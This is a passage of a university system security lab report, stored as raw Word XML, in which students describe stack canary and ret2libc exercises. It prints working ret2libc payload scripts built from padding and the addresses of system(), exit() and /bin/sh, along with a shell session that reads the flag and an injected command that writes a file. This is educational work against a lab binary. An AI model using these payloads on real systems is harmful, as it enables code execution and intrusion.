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icture"/>
        <w:keepNext w:val="true"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="240" w:after="120"/>
        <w:ind w:hanging="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="1224280"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="Verbundprojekt: Migrantenorganisationen und die Ko-Produktion sozia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erbundprojekt: Migrantenorganisationen und die Ko-Produktion sozialer ..."/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1224280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Cmlapegyetem"/>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>Ruhr Universität Bochum</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Cmlapkarstanszk"/>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>Fakultät für Informatik</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Cmlapkarstanszk"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Systemsicherheit (211011-SS 2026)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:keepLines/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:kern w:val="2"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:kern w:val="2"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>System security assignment 5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Cmlapszerz"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Matias Soto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Cmlapszerz"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Matej Heřman</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Cmlapszerz"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Daniel Szabo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:keepLines/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:smallCaps/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:smallCaps/>
        </w:rPr>
        <w:t xml:space="preserve">3 Student Group 10 </w:t>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spacing w:before="0" w:after="0"/>
        <w:ind w:hanging="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>BOCHUM, 2026</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:instrText xml:space="preserve"> SUBJECT </w:instrText>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Stack Canaries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:lang w:val="cs-CZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">This exercise is using stack canaries to ensure the return address of the function was not tampered with. We use GDB to find which canaries are in the stack_canaries array. For our canary we used number </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="cs-CZ"/>
        </w:rPr>
        <w:t>1271845313, because when transfered into bytes, it has no „bad characters“. We use the NOP slide technique (creating slide with shellscript and overwriting the return address to point in the middle of the slide). The program has to be run multiple times, for our canary to be the same as the chosen one by program randomly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:lang w:val="cs-CZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="cs-CZ"/>
        </w:rPr>
        <w:t>Solution.sh script:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5399405" cy="4640580"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="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1"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5399405" cy="4640580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Ret2Libc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Theory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Picture"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="cs-CZ" w:eastAsia="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="cs-CZ" w:eastAsia="hu-HU"/>
        </w:rPr>
        <w:t>For the first exercise:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:widowControl/>
        <w:suppressAutoHyphens w:val="true"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="360" w:before="120" w:after="240"/>
        <w:ind w:hanging="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Menlo"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="cs-CZ" w:eastAsia="hu-HU"/>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399405" cy="396494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399405" cy="3964940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Menlo"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="cs-CZ" w:eastAsia="hu-HU"/>
        </w:rPr>
        <w:t>With this approach, f_addr acts as a ret system call and uses g_addr as the direction of the function we want to jump, and we finish the execution reading the argument of the f function. After that, the program jumps to the g function with both of its arguments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:widowControl/>
        <w:suppressAutoHyphens w:val="true"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="360" w:before="120" w:after="240"/>
        <w:ind w:hanging="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Menlo"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="cs-CZ" w:eastAsia="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Menlo"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="cs-CZ" w:eastAsia="hu-HU"/>
        </w:rPr>
        <w:t>On the second exercise: Yes, it will be problematic because if the function f expects more than one parameters it will use the g_addr as a second parameter, finishing the execution and trying to return to f_arg1. This last address points to data and not a funcion, so the program will crash trying to jump on this data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>On the third exercise: We cannot add a third function without breaking the program. On the way we’re filling the stack, trying to call a third function would force us to change the order of the values. If we put h_addr on the stack we would need to change one argument on g function, and we cannot pass an argument and a return address on the same space.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Practice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>On the first task, the script solution.sh is the following:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>python3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BBBBBB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BBBBBB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
        <w:t>from struct import pack # this makes easier to write addresses on little indian format</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
        <w:t>payload = b"A" * 112 # padding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
        <w:t>payload += pack("&lt;I", 0xf7e15360) # system func address. obtained with print system (inside gdb ret2libc)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
        <w:t>payload += pack("&lt;I", 0xf7e07ec0) # exit func address. obtained with print exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
        <w:t>payload += pack("&lt;I", 0xf7f60363) # /bin/sh string address. obtained with grep "/bin/sh" (inside gdb ret2libc)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
        <w:t>sys.stdout.buffer.write(payload)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The addresses were obtained during a gdb session with the ret2libc executable. In this session, and while putting a breakpoint on main and running the executable, we can use the command “print func” to print the addresses of the functions system() and exit(), and with grep we can search strings on the environment. In this case, we can use grep “/bin/sh” to find the address of that string so we can reuse that same direction and append that to the payload in order to load the root bash session. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>With the padding we can fill the buffer on the vuln function, and after that, and with the extra padding bytes, we can replace the return function to system() function. This function is capable of executing any bash command. In this case, we also overwrite the bytes after exit() function with a pointer to a bash terminal. With this overlapping, when we execute ret2libc with the script we can access directly to a bash terminal and read the flag: NEVER_RETURN_TO_STANDARD_LIFE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>./ret2libc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BBBBBB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>$(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>./solution.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>bash-5.0$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BBBBBB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:rPr>
          <w:color w:val="BBBBBB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BBBBBB"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ret2libc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BBBBBB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ret2libc.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BBBBBB"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>solution.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BBBBBB"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>solution_grade.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BBBBBB"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>t0p_s3cr3t</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:rPr>
          <w:color w:val="BBBBBB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>bash-5.0$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BBBBBB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BBBBBB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:rPr>
          <w:color w:val="BBBBBB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>NEVER_RETURN_TO_STANDARD_LIFE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>bash-5.0$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BBBBBB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">On </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ask 2 is mostly the same, with the difference that instead of just calling the bash, we execute a series of bash command: “cd /home/user/t0p_s3cr3t &amp;&amp; touch owned &amp;&amp; echo 100 &gt; owned”. This command opens the directory, create the new file, and writes the number (in this case; 100) in the file. For this to work, we define this string as an environment variable with export COMMAND=“cd /home/user/t0p_s3cr3t &amp;&amp; touch owned &amp;&amp; echo 100 &gt; owned” (the name of the variable doesn’t matter), search for the address of this variable on gdb and replace /bin/sh with this new string that will create the new file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>On the command we need extra space so the system() function can execute the command correctly without cutting of the command in between. This may be due to difference on the stack and environment between real execution of the script and gdb.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>python3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BBBBBB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BBBBBB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
        <w:t>from struct import pack # this makes easier to write addresses on little indian format</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
        <w:t>payload = b"A" * 112 # padding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
        <w:t>payload += pack("&lt;I", 0xf7e15360) # system func address. obtained with print system (inside gdb ret2libc)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
        <w:t>payload += pack("&lt;I", 0xf7e07ec0) # exit func address. obtained with print exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
        <w:t>#payload += pack("&lt;I", 0xf7f60363) # /bin/sh string address. obtained with grep "/bin/sh" (inside gdb ret2libc)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="BA2121"/>
        </w:rPr>
        <w:t>payload += pack("&lt;I", 0xffffdeab) # on this address is the env variable COMMAND,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
